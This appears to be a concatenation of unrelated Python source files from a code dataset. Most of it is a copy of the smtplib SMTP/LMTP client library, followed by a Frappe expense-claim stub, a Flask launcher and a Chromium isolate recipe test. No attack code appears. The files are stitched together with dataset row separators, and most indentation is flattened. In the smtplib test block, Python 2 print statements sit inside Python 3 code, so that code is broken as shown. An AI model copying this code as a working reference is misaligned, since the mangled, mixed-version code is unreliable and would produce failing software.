"""Authentication error.
Most probably the server didn't accept the username/password
combination provided.
"""
def quoteaddr(addrstring):
"""Quote a subset of the email addresses defined by RFC 821.
Should be able to handle anything email.utils.parseaddr can handle.
"""
displayname, addr = email.utils.parseaddr(addrstring)
if (displayname, addr) == ('', ''):
# parseaddr couldn't parse it, use it as is and hope for the best.
if addrstring.strip().startswith('<'):
return addrstring
return "<%s>" % addrstring
return "<%s>" % addr
def _addr_only(addrstring):
displayname, addr = email.utils.parseaddr(addrstring)
if (displayname, addr) == ('', ''):
# parseaddr couldn't parse it, so use it as is.
return addrstring
return addr
# Legacy method kept for backward compatibility.
def quotedata(data):
"""Quote data for email.
Double leading '.', and change Unix newline '\\n', or Mac '\\r' into
Internet CRLF end-of-line.
"""
return re.sub(r'(?m)^\.', '..',
re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data))
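# Illustrative behaviour (added comment): leading dots are doubled and bare
# newlines become CRLF, e.g. quotedata(".hi\nthere") -> "..hi\r\nthere".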
def _quote_periods(bindata):
return re.sub(br'(?m)^\.', b'..', bindata)
def _fix_eols(data):
return re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data)
try:
import ssl
except ImportError:
_have_ssl = False
else:
_have_ssl = True
class SMTP:
"""This class manages a connection to an SMTP or ESMTP server.
SMTP Objects:
SMTP objects have the following attributes:
helo_resp
This is the message given by the server in response to the
most recent HELO command.
ehlo_resp
This is the message given by the server in response to the
most recent EHLO command. This is usually multiline.
does_esmtp
This is a True value _after you do an EHLO command_, if the
server supports ESMTP.
esmtp_features
This is a dictionary, which, if the server supports ESMTP,
will _after you do an EHLO command_, contain the names of the
SMTP service extensions this server supports, and their
parameters (if any).
Note, all extension names are mapped to lower case in the
dictionary.
See each method's docstrings for details. In general, there is a
method of the same name to perform each SMTP command. There is also a
method called 'sendmail' that will do an entire mail transaction.
"""
debuglevel = 0
file = None
helo_resp = None
ehlo_msg = "ehlo"
ehlo_resp = None
does_esmtp = 0
default_port = SMTP_PORT
def __init__(self, host='', port=0, local_hostname=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""Initialize a new instance.
If specified, `host' is the name of the remote host to which to
connect. If specified, `port' specifies the port to which to connect.
By default, smtplib.SMTP_PORT is used. If a host is specified the
connect method is called, and if it returns anything other than a
success code an SMTPConnectError is raised. If specified,
`local_hostname` is used as the FQDN of the local host in the HELO/EHLO
command. Otherwise, the local hostname is found using
socket.getfqdn(). The `source_address` parameter takes a 2-tuple (host,
port) for the socket to bind to as its source address before
connecting. If the host is '' and port is 0, the OS default behavior
will be used.
"""
self._host = host
self.timeout = timeout
self.esmtp_features = {}
self.command_encoding = 'ascii'
self.source_address = source_address
if host:
(code, msg) = self.connect(host, port)
if code != 220:
self.close()
raise SMTPConnectError(code, msg)
if local_hostname is not None:
self.local_hostname = local_hostname
else:
# RFC 2821 says we should use the fqdn in the EHLO/HELO verb, and
# if that can't be calculated, that we should use a domain literal
# instead (essentially an encoded IP address like [A.B.C.D]).
fqdn = socket.getfqdn()
if '.' in fqdn:
self.local_hostname = fqdn
else:
# We can't find an fqdn hostname, so use a domain literal
addr = '127.0.0.1'
try:
addr = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
pass
self.local_hostname = '[%s]' % addr
def __enter__(self):
return self
def __exit__(self, *args):
try:
code, message = self.docmd("QUIT")
if code != 221:
raise SMTPResponseException(code, message)
except SMTPServerDisconnected:
pass
finally:
self.close()
def set_debuglevel(self, debuglevel):
"""Set the debug output level.
A non-false value results in debug messages for connection and for all
messages sent to and received from the server.
"""
self.debuglevel = debuglevel
    def _print_debug(self, *args):
        if self.debuglevel > 1:
            print(datetime.datetime.now().time(), *args, file=sys.stderr)
        else:
            print(*args, file=sys.stderr)
def _get_socket(self, host, port, timeout):
# This makes it simpler for SMTP_SSL to use the SMTP connect code
# and just alter the socket connection bit.
if self.debuglevel > 0:
self._print_debug('connect: to', (host, port), self.source_address)
return socket.create_connection((host, port), timeout,
self.source_address)
def connect(self, host='localhost', port=0, source_address=None):
"""Connect to a host on a given port.
If the hostname ends with a colon (`:') followed by a number, and
there is no port specified, that suffix will be stripped off and the
number interpreted as the port number to use.
Note: This method is automatically invoked by __init__, if a host is
specified during instantiation.
"""
if source_address:
self.source_address = source_address
if not port and (host.find(':') == host.rfind(':')):
i = host.rfind(':')
if i >= 0:
host, port = host[:i], host[i + 1:]
try:
port = int(port)
except ValueError:
raise OSError("nonnumeric port")
if not port:
port = self.default_port
if self.debuglevel > 0:
self._print_debug('connect:', (host, port))
self.sock = self._get_socket(host, port, self.timeout)
self.file = None
(code, msg) = self.getreply()
if self.debuglevel > 0:
self._print_debug('connect:', repr(msg))
return (code, msg)
def send(self, s):
"""Send `s' to the server."""
if self.debuglevel > 0:
self._print_debug('send:', repr(s))
if hasattr(self, 'sock') and self.sock:
if isinstance(s, str):
# send is used by the 'data' command, where command_encoding
# should not be used, but 'data' needs to convert the string to
# binary itself anyway, so that's not a problem.
s = s.encode(self.command_encoding)
try:
self.sock.sendall(s)
except OSError:
self.close()
raise SMTPServerDisconnected('Server not connected')
else:
raise SMTPServerDisconnected('please run connect() first')
def putcmd(self, cmd, args=""):
"""Send a command to the server."""
if args == "":
str = '%s%s' % (cmd, CRLF)
else:
str = '%s %s%s' % (cmd, args, CRLF)
self.send(str)
def getreply(self):
"""Get a reply from the server.
Returns a tuple consisting of:
- server response code (e.g. '250', or such, if all goes well)
Note: returns -1 if it can't read response code.
- server response string corresponding to response code (multiline
responses are converted to a single, multiline string).
Raises SMTPServerDisconnected if end-of-file is reached.
"""
resp = []
if self.file is None:
self.file = self.sock.makefile('rb')
while 1:
try:
line = self.file.readline(_MAXLINE + 1)
except OSError as e:
self.close()
raise SMTPServerDisconnected("Connection unexpectedly closed: "
+ str(e))
if not line:
self.close()
raise SMTPServerDisconnected("Connection unexpectedly closed")
if self.debuglevel > 0:
self._print_debug('reply:', repr(line))
if len(line) > _MAXLINE:
self.close()
raise SMTPResponseException(500, "Line too long.")
resp.append(line[4:].strip(b' \t\r\n'))
code = line[:3]
# Check that the error code is syntactically correct.
# Don't attempt to read a continuation line if it is broken.
try:
errcode = int(code)
except ValueError:
errcode = -1
break
# Check if multiline response.
if line[3:4] != b"-":
break
errmsg = b"\n".join(resp)
if self.debuglevel > 0:
self._print_debug('reply: retcode (%s); Msg: %a' % (errcode, errmsg))
return errcode, errmsg
def docmd(self, cmd, args=""):
"""Send a command, and return its response code."""
self.putcmd(cmd, args)
return self.getreply()
# std smtp commands
def helo(self, name=''):
"""SMTP 'helo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
self.putcmd("helo", name or self.local_hostname)
(code, msg) = self.getreply()
self.helo_resp = msg
return (code, msg)
def ehlo(self, name=''):
""" SMTP 'ehlo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
self.esmtp_features = {}
self.putcmd(self.ehlo_msg, name or self.local_hostname)
(code, msg) = self.getreply()
# According to RFC1869 some (badly written)
# MTA's will disconnect on an ehlo. Toss an exception if
# that happens -ddm
if code == -1 and len(msg) == 0:
self.close()
raise SMTPServerDisconnected("Server not connected")
self.ehlo_resp = msg
if code != 250:
return (code, msg)
self.does_esmtp = 1
#parse the ehlo response -ddm
assert isinstance(self.ehlo_resp, bytes), repr(self.ehlo_resp)
resp = self.ehlo_resp.decode("latin-1").split('\n')
del resp[0]
for each in resp:
# To be able to communicate with as many SMTP servers as possible,
# we have to take the old-style auth advertisement into account,
# because:
# 1) Else our SMTP feature parser gets confused.
# 2) There are some servers that only advertise the auth methods we
# support using the old style.
auth_match = OLDSTYLE_AUTH.match(each)
if auth_match:
# This doesn't remove duplicates, but that's no problem
self.esmtp_features["auth"] = self.esmtp_features.get("auth", "") \
+ " " + auth_match.groups(0)[0]
continue
# RFC 1869 requires a space between ehlo keyword and parameters.
# It's actually stricter, in that only spaces are allowed between
            # parameters, but we're not going to check for that here.  Note
# that the space isn't present if there are no parameters.
m = re.match(r'(?P<feature>[A-Za-z0-9][A-Za-z0-9\-]*) ?', each)
if m:
feature = m.group("feature").lower()
params = m.string[m.end("feature"):].strip()
if feature == "auth":
self.esmtp_features[feature] = self.esmtp_features.get(feature, "") \
+ " " + params
else:
self.esmtp_features[feature] = params
return (code, msg)
def has_extn(self, opt):
"""Does the server support a given SMTP service extension?"""
return opt.lower() in self.esmtp_features
def help(self, args=''):
"""SMTP 'help' command.
Returns help text from server."""
self.putcmd("help", args)
return self.getreply()[1]
def rset(self):
"""SMTP 'rset' command -- resets session."""
self.command_encoding = 'ascii'
return self.docmd("rset")
def _rset(self):
"""Internal 'rset' command which ignores any SMTPServerDisconnected error.
Used internally in the library, since the server disconnected error
should appear to the application when the *next* command is issued, if
we are doing an internal "safety" reset.
"""
try:
self.rset()
except SMTPServerDisconnected:
pass
def noop(self):
"""SMTP 'noop' command -- doesn't do anything :>"""
return self.docmd("noop")
def mail(self, sender, options=[]):
"""SMTP 'mail' command -- begins mail xfer session.
This method may raise the following exceptions:
SMTPNotSupportedError The options parameter includes 'SMTPUTF8'
but the SMTPUTF8 extension is not supported by
the server.
"""
optionlist = ''
if options and self.does_esmtp:
if any(x.lower()=='smtputf8' for x in options):
if self.has_extn('smtputf8'):
self.command_encoding = 'utf-8'
else:
raise SMTPNotSupportedError(
'SMTPUTF8 not supported by server')
optionlist = ' ' + ' '.join(options)
self.putcmd("mail", "FROM:%s%s" % (quoteaddr(sender), optionlist))
return self.getreply()
def rcpt(self, recip, options=[]):
"""SMTP 'rcpt' command -- indicates 1 recipient for this mail."""
optionlist = ''
if options and self.does_esmtp:
optionlist = ' ' + ' '.join(options)
self.putcmd("rcpt", "TO:%s%s" % (quoteaddr(recip), optionlist))
return self.getreply()
def data(self, msg):
"""SMTP 'DATA' command -- sends message data to server.
Automatically quotes lines beginning with a period per rfc821.
Raises SMTPDataError if there is an unexpected reply to the
DATA command; the return value from this method is the final
        response code received when all the data is sent.  If msg
is a string, lone '\\r' and '\\n' characters are converted to
'\\r\\n' characters. If msg is bytes, it is transmitted as is.
"""
self.putcmd("data")
(code, repl) = self.getreply()
if self.debuglevel > 0:
self._print_debug('data:', (code, repl))
if code != 354:
raise SMTPDataError(code, repl)
else:
if isinstance(msg, str):
msg = _fix_eols(msg).encode('ascii')
q = _quote_periods(msg)
if q[-2:] != bCRLF:
q = q + bCRLF
q = q + b"." + bCRLF
self.send(q)
(code, msg) = self.getreply()
if self.debuglevel > 0:
self._print_debug('data:', (code, msg))
return (code, msg)
def verify(self, address):
"""SMTP 'verify' command -- checks for address validity."""
self.putcmd("vrfy", _addr_only(address))
return self.getreply()
# a.k.a.
vrfy = verify
def expn(self, address):
"""SMTP 'expn' command -- expands a mailing list."""
self.putcmd("expn", _addr_only(address))
return self.getreply()
# some useful methods
def ehlo_or_helo_if_needed(self):
"""Call self.ehlo() and/or self.helo() if needed.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
"""
if self.helo_resp is None and self.ehlo_resp is None:
if not (200 <= self.ehlo()[0] <= 299):
(code, resp) = self.helo()
if not (200 <= code <= 299):
raise SMTPHeloError(code, resp)
def auth(self, mechanism, authobject, *, initial_response_ok=True):
"""Authentication command - requires response processing.
'mechanism' specifies which authentication mechanism is to
be used - the valid values are those listed in the 'auth'
element of 'esmtp_features'.
'authobject' must be a callable object taking a single argument:
data = authobject(challenge)
It will be called to process the server's challenge response; the
challenge argument it is passed will be a bytes. It should return
bytes data that will be base64 encoded and sent to the server.
Keyword arguments:
- initial_response_ok: Allow sending the RFC 4954 initial-response
to the AUTH command, if the authentication methods supports it.
"""
# RFC 4954 allows auth methods to provide an initial response. Not all
# methods support it. By definition, if they return something other
# than None when challenge is None, then they do. See issue #15014.
mechanism = mechanism.upper()
initial_response = (authobject() if initial_response_ok else None)
if initial_response is not None:
response = encode_base64(initial_response.encode('ascii'), eol='')
(code, resp) = self.docmd("AUTH", mechanism + " " + response)
else:
(code, resp) = self.docmd("AUTH", mechanism)
# If server responds with a challenge, send the response.
if code == 334:
challenge = base64.decodebytes(resp)
response = encode_base64(
authobject(challenge).encode('ascii'), eol='')
(code, resp) = self.docmd(response)
if code in (235, 503):
return (code, resp)
raise SMTPAuthenticationError(code, resp)
def auth_cram_md5(self, challenge=None):
""" Authobject to use with CRAM-MD5 authentication. Requires self.user
and self.password to be set."""
# CRAM-MD5 does not support initial-response.
if challenge is None:
return None
return self.user + " " + hmac.HMAC(
self.password.encode('ascii'), challenge, 'md5').hexdigest()
def auth_plain(self, challenge=None):
""" Authobject to use with PLAIN authentication. Requires self.user and
self.password to be set."""
return "\0%s\0%s" % (self.user, self.password)
def auth_login(self, challenge=None):
""" Authobject to use with LOGIN authentication. Requires self.user and
self.password to be set."""
if challenge is None:
return self.user
else:
return self.password
def login(self, user, password, *, initial_response_ok=True):
"""Log in on an SMTP server that requires authentication.
The arguments are:
- user: The user name to authenticate with.
- password: The password for the authentication.
Keyword arguments:
- initial_response_ok: Allow sending the RFC 4954 initial-response
to the AUTH command, if the authentication methods supports it.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
This method will return normally if the authentication was successful.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
SMTPAuthenticationError The server didn't accept the username/
password combination.
SMTPNotSupportedError The AUTH command is not supported by the
server.
SMTPException No suitable authentication method was
found.
"""
self.ehlo_or_helo_if_needed()
if not self.has_extn("auth"):
raise SMTPNotSupportedError(
"SMTP AUTH extension not supported by server.")
# Authentication methods the server claims to support
advertised_authlist = self.esmtp_features["auth"].split()
# Authentication methods we can handle in our preferred order:
preferred_auths = ['CRAM-MD5', 'PLAIN', 'LOGIN']
# We try the supported authentications in our preferred order, if
# the server supports them.
authlist = [auth for auth in preferred_auths
if auth in advertised_authlist]
if not authlist:
raise SMTPException("No suitable authentication method found.")
# Some servers advertise authentication methods they don't really
# support, so if authentication fails, we continue until we've tried
# all methods.
self.user, self.password = user, password
for authmethod in authlist:
method_name = 'auth_' + authmethod.lower().replace('-', '_')
try:
(code, resp) = self.auth(
authmethod, getattr(self, method_name),
initial_response_ok=initial_response_ok)
# 235 == 'Authentication successful'
# 503 == 'Error: already authenticated'
if code in (235, 503):
return (code, resp)
except SMTPAuthenticationError as e:
last_exception = e
# We could not login successfully. Return result of last attempt.
raise last_exception
def starttls(self, keyfile=None, certfile=None, context=None):
"""Puts the connection to the SMTP server into TLS mode.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
If the server supports TLS, this will encrypt the rest of the SMTP
session. If you provide the keyfile and certfile parameters,
the identity of the SMTP server and client can be checked. This,
however, depends on whether the socket module really checks the
certificates.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
"""
self.ehlo_or_helo_if_needed()
if not self.has_extn("starttls"):
raise SMTPNotSupportedError(
"STARTTLS extension not supported by server.")
(resp, reply) = self.docmd("STARTTLS")
if resp == 220:
if not _have_ssl:
raise RuntimeError("No SSL support included in this Python")
if context is not None and keyfile is not None:
raise ValueError("context and keyfile arguments are mutually "
"exclusive")
if context is not None and certfile is not None:
raise ValueError("context and certfile arguments are mutually "
"exclusive")
if keyfile is not None or certfile is not None:
import warnings
warnings.warn("keyfile and certfile are deprecated, use a"
"custom context instead", DeprecationWarning, 2)
if context is None:
context = ssl._create_stdlib_context(certfile=certfile,
keyfile=keyfile)
self.sock = context.wrap_socket(self.sock,
server_hostname=self._host)
self.file = None
# RFC 3207:
# The client MUST discard any knowledge obtained from
# the server, such as the list of SMTP service extensions,
# which was not obtained from the TLS negotiation itself.
self.helo_resp = None
self.ehlo_resp = None
self.esmtp_features = {}
self.does_esmtp = 0
else:
# RFC 3207:
# 501 Syntax error (no parameters allowed)
# 454 TLS not available due to temporary reason
raise SMTPResponseException(resp, reply)
return (resp, reply)
def sendmail(self, from_addr, to_addrs, msg, mail_options=[],
rcpt_options=[]):
"""This command performs an entire mail transaction.
The arguments are:
- from_addr : The address sending this mail.
- to_addrs : A list of addresses to send this mail to. A bare
string will be treated as a list with 1 address.
- msg : The message to send.
- mail_options : List of ESMTP options (such as 8bitmime) for the
mail command.
- rcpt_options : List of ESMTP options (such as DSN commands) for
all the rcpt commands.
msg may be a string containing characters in the ASCII range, or a byte
string. A string is encoded to bytes using the ascii codec, and lone
\\r and \\n characters are converted to \\r\\n characters.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first. If the server does ESMTP, message size
and each of the specified options will be passed to it. If EHLO
fails, HELO will be tried and ESMTP options suppressed.
This method will return normally if the mail is accepted for at least
one recipient. It returns a dictionary, with one entry for each
recipient that was refused. Each entry contains a tuple of the SMTP
error code and the accompanying error message sent by the server.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
SMTPRecipientsRefused The server rejected ALL recipients
(no mail was sent).
SMTPSenderRefused The server didn't accept the from_addr.
SMTPDataError The server replied with an unexpected
error code (other than a refusal of
a recipient).
SMTPNotSupportedError The mail_options parameter includes 'SMTPUTF8'
but the SMTPUTF8 extension is not supported by
the server.
Note: the connection will be open even after an exception is raised.
Example:
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> tolist=["[email protected]","[email protected]","[email protected]","[email protected]"]
>>> msg = '''\\
... From: [email protected]
... Subject: testin'...
...
... This is a test '''
>>> s.sendmail("[email protected]",tolist,msg)
{ "[email protected]" : ( 550 ,"User unknown" ) }
>>> s.quit()
In the above example, the message was accepted for delivery to three
of the four addresses, and one was rejected, with the error code
550. If all addresses are accepted, then the method will return an
empty dictionary.
"""
self.ehlo_or_helo_if_needed()
esmtp_opts = []
if isinstance(msg, str):
msg = _fix_eols(msg).encode('ascii')
if self.does_esmtp:
if self.has_extn('size'):
esmtp_opts.append("size=%d" % len(msg))
for option in mail_options:
esmtp_opts.append(option)
(code, resp) = self.mail(from_addr, esmtp_opts)
if code != 250:
if code == 421:
self.close()
else:
self._rset()
raise SMTPSenderRefused(code, resp, from_addr)
senderrs = {}
if isinstance(to_addrs, str):
to_addrs = [to_addrs]
for each in to_addrs:
(code, resp) = self.rcpt(each, rcpt_options)
if (code != 250) and (code != 251):
senderrs[each] = (code, resp)
if code == 421:
self.close()
raise SMTPRecipientsRefused(senderrs)
if len(senderrs) == len(to_addrs):
# the server refused all our recipients
self._rset()
raise SMTPRecipientsRefused(senderrs)
(code, resp) = self.data(msg)
if code != 250:
if code == 421:
self.close()
else:
self._rset()
raise SMTPDataError(code, resp)
#if we got here then somebody got our mail
return senderrs
def send_message(self, msg, from_addr=None, to_addrs=None,
mail_options=[], rcpt_options={}):
"""Converts message to a bytestring and passes it to sendmail.
The arguments are as for sendmail, except that msg is an
email.message.Message object. If from_addr is None or to_addrs is
None, these arguments are taken from the headers of the Message as
described in RFC 2822 (a ValueError is raised if there is more than
one set of 'Resent-' headers). Regardless of the values of from_addr and
        to_addrs, any Bcc field (or Resent-Bcc field, when the Message is a
resent) of the Message object won't be transmitted. The Message
object is then serialized using email.generator.BytesGenerator and
sendmail is called to transmit the message. If the sender or any of
the recipient addresses contain non-ASCII and the server advertises the
SMTPUTF8 capability, the policy is cloned with utf8 set to True for the
serialization, and SMTPUTF8 and BODY=8BITMIME are asserted on the send.
        If the server does not support SMTPUTF8, an SMTPNotSupportedError is
raised. Otherwise the generator is called without modifying the
policy.
"""
# 'Resent-Date' is a mandatory field if the Message is resent (RFC 2822
# Section 3.6.6). In such a case, we use the 'Resent-*' fields. However,
# if there is more than one 'Resent-' block there's no way to
# unambiguously determine which one is the most recent in all cases,
# so rather than guess we raise a ValueError in that case.
#
# TODO implement heuristics to guess the correct Resent-* block with an
# option allowing the user to enable the heuristics. (It should be
# possible to guess correctly almost all of the time.)
self.ehlo_or_helo_if_needed()
resent = msg.get_all('Resent-Date')
if resent is None:
header_prefix = ''
elif len(resent) == 1:
header_prefix = 'Resent-'
else:
raise ValueError("message has more than one 'Resent-' header block")
if from_addr is None:
# Prefer the sender field per RFC 2822:3.6.2.
from_addr = (msg[header_prefix + 'Sender']
if (header_prefix + 'Sender') in msg
else msg[header_prefix + 'From'])
from_addr = email.utils.getaddresses([from_addr])[0][1]
if to_addrs is None:
addr_fields = [f for f in (msg[header_prefix + 'To'],
msg[header_prefix + 'Bcc'],
msg[header_prefix + 'Cc'])
if f is not None]
to_addrs = [a[1] for a in email.utils.getaddresses(addr_fields)]
# Make a local copy so we can delete the bcc headers.
msg_copy = copy.copy(msg)
del msg_copy['Bcc']
del msg_copy['Resent-Bcc']
international = False
try:
''.join([from_addr, *to_addrs]).encode('ascii')
except UnicodeEncodeError:
if not self.has_extn('smtputf8'):
raise SMTPNotSupportedError(
"One or more source or delivery addresses require"
" internationalized email support, but the server"
" does not advertise the required SMTPUTF8 capability")
international = True
with io.BytesIO() as bytesmsg:
if international:
g = email.generator.BytesGenerator(
bytesmsg, policy=msg.policy.clone(utf8=True))
mail_options += ['SMTPUTF8', 'BODY=8BITMIME']
else:
g = email.generator.BytesGenerator(bytesmsg)
g.flatten(msg_copy, linesep='\r\n')
flatmsg = bytesmsg.getvalue()
return self.sendmail(from_addr, to_addrs, flatmsg, mail_options,
rcpt_options)
def close(self):
"""Close the connection to the SMTP server."""
try:
file = self.file
self.file = None
if file:
file.close()
finally:
sock = self.sock
self.sock = None
if sock:
sock.close()
def quit(self):
"""Terminate the SMTP session."""
res = self.docmd("quit")
# A new EHLO is required after reconnecting with connect()
self.ehlo_resp = self.helo_resp = None
self.esmtp_features = {}
self.does_esmtp = False
self.close()
return res
if _have_ssl:
class SMTP_SSL(SMTP):
""" This is a subclass derived from SMTP that connects over an SSL
encrypted socket (to use this class you need a socket module that was
compiled with SSL support). If host is not specified, '' (the local
host) is used. If port is omitted, the standard SMTP-over-SSL port
(465) is used. local_hostname and source_address have the same meaning
as they do in the SMTP class. keyfile and certfile are also optional -
they can contain a PEM formatted private key and certificate chain file
for the SSL connection. context also optional, can contain a
SSLContext, and is an alternative to keyfile and certfile; If it is
specified both keyfile and certfile must be None.
"""
default_port = SMTP_SSL_PORT
def __init__(self, host='', port=0, local_hostname=None,
keyfile=None, certfile=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, context=None):
if context is not None and keyfile is not None:
raise ValueError("context and keyfile arguments are mutually "
"exclusive")
if context is not None and certfile is not None:
raise ValueError("context and certfile arguments are mutually "
"exclusive")
if keyfile is not None or certfile is not None:
import warnings
warnings.warn("keyfile and certfile are deprecated, use a"
"custom context instead", DeprecationWarning, 2)
self.keyfile = keyfile
self.certfile = certfile
if context is None:
context = ssl._create_stdlib_context(certfile=certfile,
keyfile=keyfile)
self.context = context
SMTP.__init__(self, host, port, local_hostname, timeout,
source_address)
def _get_socket(self, host, port, timeout):
if self.debuglevel > 0:
self._print_debug('connect:', (host, port))
new_socket = socket.create_connection((host, port), timeout,
self.source_address)
new_socket = self.context.wrap_socket(new_socket,
server_hostname=self._host)
return new_socket
__all__.append("SMTP_SSL")
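    # A brief sketch (host and credentials are placeholders) of the
    # implicit-TLS variant: SMTP_SSL speaks TLS from the first byte,
    # typically on port 465, instead of upgrading a session with STARTTLS.
    def _example_smtp_ssl():
        context = ssl.create_default_context()
        with SMTP_SSL('mail.example.org', 465, context=context) as server:
            server.login('sender@example.org', 'app-password')
            server.sendmail('sender@example.org', ['recipient@example.org'],
                            'From: sender@example.org\r\n\r\nhello\r\n')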
#
# LMTP extension
#
LMTP_PORT = 2003
class LMTP(SMTP):
"""LMTP - Local Mail Transfer Protocol
The LMTP protocol, which is very similar to ESMTP, is heavily based
on the standard SMTP client. It's common to use Unix sockets for
LMTP, so our connect() method must support that as well as a regular
host:port server. local_hostname and source_address have the same
meaning as they do in the SMTP class. To specify a Unix socket,
you must use an absolute path as the host, starting with a '/'.
Authentication is supported, using the regular SMTP mechanism. When
    using a Unix socket, LMTP servers generally don't support or require any
authentication, but your mileage might vary."""
ehlo_msg = "lhlo"
def __init__(self, host='', port=LMTP_PORT, local_hostname=None,
source_address=None):
"""Initialize a new instance."""
SMTP.__init__(self, host, port, local_hostname=local_hostname,
source_address=source_address)
def connect(self, host='localhost', port=0, source_address=None):
"""Connect to the LMTP daemon, on either a Unix or a TCP socket."""
if host[0] != '/':
return SMTP.connect(self, host, port, source_address=source_address)
# Handle Unix-domain sockets.
try:
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.file = None
self.sock.connect(host)
except OSError:
if self.debuglevel > 0:
self._print_debug('connect fail:', host)
if self.sock:
self.sock.close()
self.sock = None
raise
(code, msg) = self.getreply()
if self.debuglevel > 0:
self._print_debug('connect:', msg)
return (code, msg)
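# A short sketch of local delivery over LMTP via a Unix-domain socket; the
# socket path and the addresses are placeholders for whatever the local MDA
# actually uses.
def _example_lmtp_unix_socket():
    with LMTP('/var/run/lmtp.sock') as client:
        client.sendmail('sender@example.org', ['recipient@example.org'],
                        'From: sender@example.org\r\n\r\nhello\r\n')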
# Test the sendmail method, which tests most of the others.
# Note: This always sends to localhost.
if __name__ == '__main__':
def prompt(prompt):
sys.stdout.write(prompt + ": ")
sys.stdout.flush()
return sys.stdin.readline().strip()
fromaddr = prompt("From")
toaddrs = prompt("To").split(',')
print "Enter message, end with ^D:"
msg = ''
while 1:
line = sys.stdin.readline()
if not line:
break
msg = msg + line
print "Message length is %d" % len(msg)
server = SMTP('localhost')
server.set_debuglevel(1)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
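# A minimal sketch of a typical submission session with the classes above:
# check the server's capabilities, upgrade to TLS, authenticate, and hand off
# a message built with the email package.  Host, account and recipients are
# placeholders, not part of this module.
def _example_starttls_submission():
    from email.message import EmailMessage
    msg = EmailMessage()
    msg['From'] = 'sender@example.org'
    msg['To'] = 'recipient@example.org'
    msg['Subject'] = 'hello'
    msg.set_content('This is a test.')
    with SMTP('mail.example.org', 587) as server:
        server.ehlo()
        if server.has_extn('starttls'):
            server.starttls()
            server.ehlo()
        server.login('sender@example.org', 'app-password')
        server.send_message(msg)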
|
py | 7df9ff6918bd759550ade298c8c78d1745616b95 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class InvalidExpenseApproverError(frappe.ValidationError): pass
class ExpenseApproverIdentityError(frappe.ValidationError): pass
class ExpenseClaim(Document):
pass
|
py | 7dfa00900188b0b014406401e76aac1887c7a49c | from app import create_app
import logging
from logging.config import dictConfig
from logconfig import LogConfig
config = LogConfig(info_file=r'data/courtLoseCredit.log', err_file=r'data/courtLoseCreditErr.log').log_config
logging.config.dictConfig(config)
application_court = create_app()
if __name__ == '__main__':
application_court.run(host='0.0.0.0', port=5002)
|
py | 7dfa009f65080533cbd836d942429b41861f5206 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# TODO(borenet): This module was copied from build.git and heavily modified to
# remove dependencies on other modules in build.git. It belongs in a different
# repo. Remove this once it has been moved.
from recipe_engine.recipe_api import Property
DEPS = [
'isolate',
'recipe_engine/json',
'recipe_engine/path',
'recipe_engine/properties',
'recipe_engine/step',
'swarming_client',
]
PROPERTIES = {
'always_use_exparchive': Property(
kind=bool, help="Force usage of exparchive.", default=False),
}
def RunSteps(api, always_use_exparchive):
# 'isolate_tests' step needs swarming checkout.
api.swarming_client.checkout('master')
# Code coverage for isolate_server property.
api.isolate.isolate_server = 'https://isolateserver-dev.appspot.com'
assert api.isolate.isolate_server == 'https://isolateserver-dev.appspot.com'
# That would read a list of files to search for, generated in GenTests.
step_result = api.step('read test spec', ['cat'], stdout=api.json.output())
expected_targets = step_result.stdout
build_path = api.isolate.package_repo_resource()
# Generates code coverage for find_isolated_tests corner cases.
# TODO(vadimsh): This step doesn't actually make any sense when the recipe
# is running for real via run_recipe.py.
api.isolate.find_isolated_tests(build_path, expected_targets)
  # Code coverage for 'isolate_tests'. 'isolate_tests' doesn't support discovery
# of isolated targets in build directory, so skip if 'expected_targets' is
# None.
if expected_targets is not None:
api.isolate.isolate_tests(
build_path, expected_targets,
always_use_exparchive=always_use_exparchive)
def GenTests(api):
def make_test(
name,
expected_batcharchive_targets,
expected_exparchive_targets,
discovered_targets):
if expected_batcharchive_targets or expected_exparchive_targets:
all_expected_targets = (
(expected_batcharchive_targets or []) +
(expected_exparchive_targets or []))
else:
all_expected_targets = None
missing = set(all_expected_targets or []) - set(discovered_targets or [])
output = (
api.test(name) +
api.step_data(
'read test spec',
stdout=api.json.output(all_expected_targets)) +
api.override_step_data(
'find isolated tests',
api.isolate.output_json(discovered_targets))
)
# See comment around 'if expected_targets is not None' above.
if all_expected_targets:
for target in sorted(expected_exparchive_targets):
output += api.override_step_data(
'isolate %s' % target,
api.isolate.output_json([target], missing))
if expected_batcharchive_targets:
output += api.override_step_data(
'isolate tests',
api.isolate.output_json(expected_batcharchive_targets, missing))
return output
# Expected targets == found targets.
yield make_test(
'basic', ['test1', 'test2'], [], ['test1', 'test2'])
# No expectations, just discovering what's there returned by default mock.
yield make_test(
'discover', None, None, None)
# Found more than expected.
yield make_test(
'extra', ['test1', 'test2'], [], ['test1', 'test2', 'extra_test'])
# Didn't find something.
yield (
make_test('missing', ['test1', 'test2'], [], ['test1']) +
api.properties.generic(buildername='Windows Swarm Test'))
# No expectations, and nothing has been found, produces warning.
yield make_test('none', None, None, [])
# Test the `exparchive` cases
# Only exparchive
yield make_test(
'exparchive', [], ['test_exparchive'], ['test_exparchive'])
yield make_test(
'exparchive-miss', [], ['test_exparchive'], [])
yield make_test(
'exparchive-multi',
[],
